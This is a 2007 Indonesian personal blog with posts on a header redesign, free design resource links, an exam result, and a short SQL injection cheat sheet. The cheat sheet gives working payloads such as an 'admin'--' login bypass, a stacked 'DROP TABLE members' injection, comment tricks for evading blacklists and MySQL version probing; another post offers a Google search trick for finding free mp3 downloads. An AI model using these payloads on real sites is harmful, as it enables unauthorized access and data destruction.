Thursday, May 17, 2007

Ada yang beda ga yah??

Perhatiin deh blog aku ini, ada yang beda ga yah??
Yap kamu betul sekali, jika kamu sering maen & pernah liat blog aku sebelumya pasti tau. Karena terlihat jelas bahwa header yang dulu dirajai dengan warna merah jambu gak jelas, sekarang berubah warnanya menjadi orange. Kenapa dibilang ga jelas, yaeyalah dari namanya aja udah ketauan, ini nama warna apa nama pu'un (baca:pohon) sih, bisa juga nama buah, :halah: warna yang aneh.

Designnya cuma modal brush photoshop sama font yang kemaren abis aku donlot. Linknya bisa dicari di postingan aku sebelumnya. Tinggal klik sana klik sini selama 2 jam, ga kerasa designnya malah jadi berantakan, hehehe. Gara"nya keasikkan pake brush yang baru di donlot yang banyak banget. Karena semuanya keren" yaudah aku brush semua canvasnya, alhasil malah jadi keramean brush dimana-mana, aturannya tadi cuma butuh 2 jam jadi molor 4 jam, nyahahaha.

Tampang header yang udah jadul :


Tampang header yang masih gress :


Tools :
1. Adobe Photoshop 7.0

Brush :
1. Swirly Ornaments by Angeles + Papersweets Brush.abr
2. Background brushes by Angèles + Papersweets Brush.abr
3. Decorative Ornaments by Angèles Brush.abr

Fonts :
1. Dimitri Swank.TTF
2. Teacher_A.TTF
3. Verdana.TTF

Wednesday, May 16, 2007

Free Link (Title yg aneh..)

#1 --> (Brushes for Photoshop version higher than 7.0) || (Brushes for Photoshop version 7.0)
Tinggal pilih brush mana yg mau di donlot, trus klik Download Now!
Tips : klo mau liat brush yg keren pilih menu Ornamen, Shapes, Splatters & Spills di dropdown menunya (buat versi Photoshop higher than 7.0). Switly Brushes sama Vector & technic (buat versi Photoshop 7.0) jg ga kalah kerennya.

#2 --> Free fonts
Tersedia banyak jenis font yg bisa kamu donlot secara gratis. Tinggal pilih di menu Browse Free Fonts.
Tips : 3D, Futuristic, sama Rounded fontnya keren". Tapi Computer, Grafitti sama Typewriter juga ga kalah keren.

#3 --> Shopping chart (PHP file)
Tinggal donlot .zip nya, terus di ekstrak ke folder htdocs kamu. Buat bikin databasenya tinggal di dump plaincart.sql nya, klo ga ngerti baca README nya aja ^^

#4 --> Color picker with javascript
Simply, easy and useful.

#5 --> Search mp3 di google
Keyword buat mencari link donlot mp3 di google. Sebenernya ini cara lama, tapi cukup membantu ko bagi kamu" yg ingin donlot mp3 gratisan.
Tips : klo mau lebih spesifik lagi nyarinya kamu tinggal menambahkan judul lagu / nama penyanyi / nama bandnya di belakang keywordnya.
Contoh : kamu mau mencari lagu MCR a.k.a My Chemical Romance yang judulnya Thank You For The Venom.

Tinggal tambahkan pada keywordnya sbb :
?intitle:index.of? my chemical romance thank you for the venom mp3

Friday, May 11, 2007

Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks

Ending / Commenting Out / Line Comments

I. Line Comments
Comments out rest of the query.
Line comments biasanya berguna banget buat meng'ignore' sisa dari pernyataan query, jadi kamu ga usah pusing pusing lagi buat ngakhirin syntaxnya.
Cara-caranya antara lain :

1. -- (SM)
DROP sampletable;--

2. # (M)
DROP sampletable;#

*Contoh SQL Injection Attacks menggunakan Line Comments

1. Username: admin'--

2. SELECT * FROM members WHERE username = 'admin'--' AND password ='password'
Ini memungkinkan kamu dapat login sebagai user admin, karena SQL query yang terakhir akan di'ignore', yaitu pada SQL AND password ='password'


II. Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

1. /*Comment Here*/ (SM)

* DROP/*comment*/sampletable
* DR/**/OP/*bypass blacklisting*/sampletable
* SELECT/*avoid-spaces*/password/**/FROM/**/Members

2. /*! MYSQL Special SQL */ (M)
Ini merupakan syntax comment spesial di dalam MySQL. Ini berguna untuk mendetect versi MySQL. Kalo kamu masukin kode kedalam comment tersebut maka kode tersebut akan dieksekusi hanya di dalam MySQL saja. Kamu juga bisa menggunakan cara tersebut untuk mengeksekusi beberapa kode tetapi jika versi servernya lebih besar daripada versi yang tersedia.

SELECT /*!32302 1/0, */ 1 FROM tablename

*Contoh SQL Injection Attacks menggunakan Classical Inline Comment

1. ID: 10; DROP TABLE members /*
Dengan cara ini dengan mudah kamu dapat menghilangkan SQL query yang lain pada baris query terakhir. Atau dapat juga dilakukan dengan menggunakan 10; DROP TABLE members --

2. SELECT /*!32302 1/0, */ 1 FROM tablename
Dengan cara ini kamu dapat membuang sebagian dari query dengan nilai error sama dengan 0 jika versi MySQL lebih besar dari 3.23.02

*Contoh MySQL Version Detection Attacks

1. ID: /*! 32302 10 */

2. ID: 10
Kamu akan melihat response yang sama jika versi MySQL lebih besar dari 3.23.02

3. SELECT /*!32302 1/0, */ 1 FROM tablename
Dengan cara ini kita dapat membuang sebagian dari query dengan nilai error sama dengan 0 jika versi MySQL lebih besar dari 3.23.02


*Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.

Wednesday, May 2, 2007

Don't be confused


beuh..
masa gw bisa dpt rank 2..
padahal gw ngisi multiple choicenya cap cip cup..
dari integral, diferensial, matrix, logika apalah itu, gw gag ngarti..
wekekekek..

gw gag tau deh..
emang gw nebaknya bener..
apa emang gwnya yang pintar..
jiakakakak..

gw ambil gag yah??
klo gag gw ambil, sayang 200 rebu sama dah lulus rank 2..
klo gw ambil, gw gag tau dapet duidnya darimana buat bayar SPP sama Uang Gedung..

confused mode ON (_ _!)